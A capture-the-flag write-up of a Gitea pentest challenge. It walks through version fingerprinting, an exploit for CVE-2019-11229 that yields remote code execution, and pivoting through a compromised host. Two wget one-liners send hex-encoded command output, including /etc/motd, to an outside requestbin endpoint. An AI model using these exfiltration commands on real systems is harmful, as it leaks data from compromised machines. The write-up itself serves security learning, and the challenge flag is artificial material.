Tea time

Pentest, 20 points


We lost access to our versioning server, the attacker removed our ssh keys. Please get it back and connect to the server using SSH to get the flag.

by Masterfox


This challenge was only reachable within a specific network. We could access Tea time only through a machine we compromised from a previous challenge, only with a command-line interface then, at first. After a few minutes, to be more comfortable, we designed some iptables rules according to https://www.ired.team/offensive-security/red-team-infrastructure/redirectors-forwarders, to access from our browsers, the challenge.

First, we identify the version of Gitea with its commit: we can notice Gitea Version: 73ce024 on the footer's page. We find Gitea's version then which is 1.8.0 RC2 with this commit https://github.com/go-gitea/gitea/commit/73ce02400cec659bd7a7ee3798ff73a4c7c85957. We notice that this version was released on 27th March 2019, which is quite old. There is probably some exploits that we can use!

We first looked at one from Podalirius (https://www.exploit-db.com/exploits/49571) presented in his article https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/. After some tries, we realized that we couldn't use this exploit as our Gitea's configuration didn't enable Git hooks by users.

Back to square one, we are searching for another exploit. Thanks to https://www.cvedetails.com/ we found the CVE-2019-11229 which enables code execution, this is interesting.

Thanks to https://www.exploit-db.com/exploits/49383, https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa and some manual crafting, notably to modify the exploit as the originally designed server was not working fine, we had a RCE on the Tea time machine. Though, we had to design a specific exfiltration technique to retrieve some information from our executed commands. To list files and directories, we could do for instance the following command:

wget http://requestbin.net/r/xxx?x=$(ls | xxd -p | tr -d '\\n')

Okay, we have RCE, now focus back on the challenge and on what we are looking for. We thought that the flag was prompted when logging in through SSH in the SSH banner. Then, after reading some documentation such as https://www.tecmint.com/protect-ssh-logins-with-ssh-motd-banner-messages/ we dumped /etc/motd content:

wget http://requestbin.net/r/xxx?x=$(cat /etc/motd | xxd -p | tr -d '\\n')

Which contained the flag NORZH{k33p_upd4t1ng_3Veryd4y}

results matching ""

    No results matching ""